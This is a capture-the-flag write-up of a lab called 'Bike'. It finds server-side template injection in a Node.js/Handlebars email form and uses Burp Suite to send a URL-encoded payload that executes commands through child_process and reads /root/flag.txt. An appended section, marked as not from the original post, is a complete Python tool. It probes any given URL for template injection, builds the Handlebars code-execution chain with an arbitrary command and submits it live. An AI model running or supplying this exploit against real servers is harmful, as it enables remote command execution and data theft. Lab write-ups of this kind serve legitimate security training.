
Bike - Linux

  • justinblawitz
  • Oct 8, 2025
  • 3 min read
  • Ping and Nmap the target IP using nmap -sC -sV -v {target IP}: -sC runs the default NSE scripts, -sV probes each open port for its service and version, and -v makes Nmap print progress information while the scan is running.

  • We see two open ports: 22/tcp running SSH and 80/tcp running HTTP, which is where we'll focus. Next, we browse to the target IP.

  • We are brought to an unfinished website with a single field for entering an email address. Wappalyzer, like Nmap, identifies the backend as Node.js. Node.js is an open-source, cross-platform, back-end JavaScript runtime environment used to build scalable network applications. Wappalyzer also reports that the web framework is Express, which Nmap confirms. Express is a minimal and flexible Node.js web application framework that provides a robust set of features for web and mobile applications.


  • After entering an email address, the page reflects our input back to us. Reflected input is worth testing because the application may be inserting it into a server-side template; in this lab we exploit a Server-Side Template Injection (SSTI) vulnerability. Template engines are used to render dynamically generated content on a web page. Server-side template injection occurs when attacker-controlled input is placed into a template and interpreted as template syntax, which in many engines can be escalated to executing commands on the server. A quick search on SSTI vulnerabilities leads to the HackTricks article that will be referenced later in the lab: https://book.hacktricks.wiki/en/pentesting-web/ssti-server-side-template-injection/index.html.


  • The Detection section of the article lists the special characters commonly used in template expressions, such as ${7*7}, {{7*7}}, and others, which can help us find an SSTI vulnerability: an engine that evaluates the expression returns 49, and an engine that rejects it often throws an error that names itself. In this case, entering {{7*7}} into the email field produces an error message revealing that the page uses the "handlebars" template engine and that the application is running from the /root/Backend/ directory.

 

  • Using Burp Suite we can capture the request and edit it. Burp Suite lets users intercept, inspect, modify, and replay HTTP/HTTPS traffic between a web browser and a web server, which makes it easy to experiment with payloads while looking for security vulnerabilities.


  • In the Proxy tab we open Burp's browser and navigate to the target IP, type {{7*7}} into the email field, turn Intercept on in Burp Suite, and submit the form. The captured POST request is then sent to the Repeater tab.

  • In the Repeater tab we can edit the request to send anything we want. Using the Handlebars payload from HackTricks, we need to call require and load a module: child_process is available in every default Node.js installation and can be used to execute system commands. Because the payload contains characters that have special meaning in a form body (such as #, &, = and braces), we paste it into the Decoder tab and encode it as URL before placing it in the request.

  • We then copy the encoded string, paste it as the value of the email field in the Repeater tab, and click Send in the top left. After selecting Render in the Response section, we can see that the request was received and the output appears below the email field on the web page.

  • Since we can now run commands through child_process, we copy more code from HackTricks into the Decoder tab, change the command to list the /root directory, and encode it as URL. After entering the encoded string into the email field, the response in the Repeater tab lists flag.txt in /root.

  • Finally, we go back and edit that same payload to run cat /root/flag.txt and URL-encode it again. After pasting the encoded string into the email field and sending the request, the file contents appear in the Response section and we capture the flag.
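The detection and exploitation steps above, as an added example that is not part of the original post: a small Python helper that sends the HackTricks probe expressions, classifies the response (49 means evaluated, an error naming "handlebars" means the engine leaked itself, verbatim reflection means no template at all), pulls filesystem paths such as /root/Backend/ out of a stack trace, and URL-encodes the Handlebars gadget chain published on HackTricks the way Burp's Decoder does. The form field name `email`, the POST target `/`, the sample error text and the choice of `process.mainModule.require` (a common substitute when plain `require` is not in scope inside the template runtime) are assumptions, not details from the page.

```python
#!/usr/bin/env python3
"""SSTI probing and Handlebars payload encoding (added example, not from the post).

Assumptions: the page posts application/x-www-form-urlencoded with one field
named `email`; the caller supplies the base URL. Only the standard library is used.
"""
import re
import sys
import urllib.parse
import urllib.request

# Probe expressions from the Detection section of the HackTricks SSTI page.
PROBES = ["{{7*7}}", "${7*7}", "<%= 7*7 %>", "#{7*7}", "*{7*7}"]

# Strings an engine tends to leak in its own error output.
ENGINE_HINTS = {"handlebars": "handlebars", "jinja": "jinja2",
                "twig": "twig", "freemarker": "freemarker"}

# Constructed sample of the kind of error Handlebars raises for {{7*7}}; it does
# not evaluate arithmetic, so the tell is the parse error, not the number 49.
SAMPLE_ERROR = """Error: Parse error on line 1:
{{7*7}}
--^
Expecting 'ID', 'STRING', 'NUMBER', 'BOOLEAN', 'UNDEFINED', 'NULL', 'DATA', got 'INVALID'
    at Parser.parseError (/root/Backend/node_modules/handlebars/dist/cjs/handlebars/compiler/parser.js:267:19)"""


def classify(probe, body):
    """Return (verdict, detail) for one probe: 'evaluated', 'error', 'reflected' or 'unknown'."""
    if "49" in body and probe not in body:
        return ("evaluated", "49")
    low = body.lower()
    for hint, engine in ENGINE_HINTS.items():
        if hint in low:
            return ("error", engine)
    if probe in body:
        return ("reflected", probe)
    return ("unknown", "")


def leaked_paths(body):
    """Absolute paths found in a stack trace; they reveal where the app lives on disk."""
    return sorted(set(re.findall(r"(/[\w.\-]+(?:/[\w.\-]+)+)", body)))


# Handlebars gadget chain as published on HackTricks: it reaches the Function
# constructor via string.sub.constructor and invokes it with attacker-supplied source.
HANDLEBARS_RCE = """{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "__JS__"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}"""


def js_body(command, via_main_module=True):
    """JavaScript the chain executes. require() is not always in scope inside the
    template runtime; process.mainModule.require reaches it from the entry module (assumption)."""
    req = "process.mainModule.require" if via_main_module else "require"
    cmd = command.replace("\\", "\\\\").replace("'", "\\'")
    return f"return {req}('child_process').execSync('{cmd}');"


def build_payload(command, via_main_module=True):
    """Full Handlebars template that runs `command` on the server."""
    return HANDLEBARS_RCE.replace("__JS__", js_body(command, via_main_module))


def form_body(email_value):
    """What Burp's Decoder produces: a form-encoded body where #, |, &, = and braces
    are percent-encoded so the web framework does not parse them as form syntax."""
    return urllib.parse.urlencode({"email": email_value})


def submit(url, email_value, timeout=10):
    """POST the encoded field and return the response body (network call)."""
    req = urllib.request.Request(url, data=form_body(email_value).encode(), method="POST",
                                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Offline demonstration on the constructed sample, then optional live probing.
    print(classify("{{7*7}}", SAMPLE_ERROR), leaked_paths(SAMPLE_ERROR))
    if len(sys.argv) > 1:
        base = sys.argv[1].rstrip("/") + "/"
        for probe in PROBES:
            print(probe, classify(probe, submit(base, probe)))
        print(submit(base, build_payload(sys.argv[2] if len(sys.argv) > 2 else "ls /root")))
```

Run it with no arguments to see the classification of the constructed sample; pass the target URL (and optionally a command) to send the probes and the payload for real. The command is inserted into a single-quoted JavaScript string, so quotes and backslashes in it are escaped rather than trusted.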
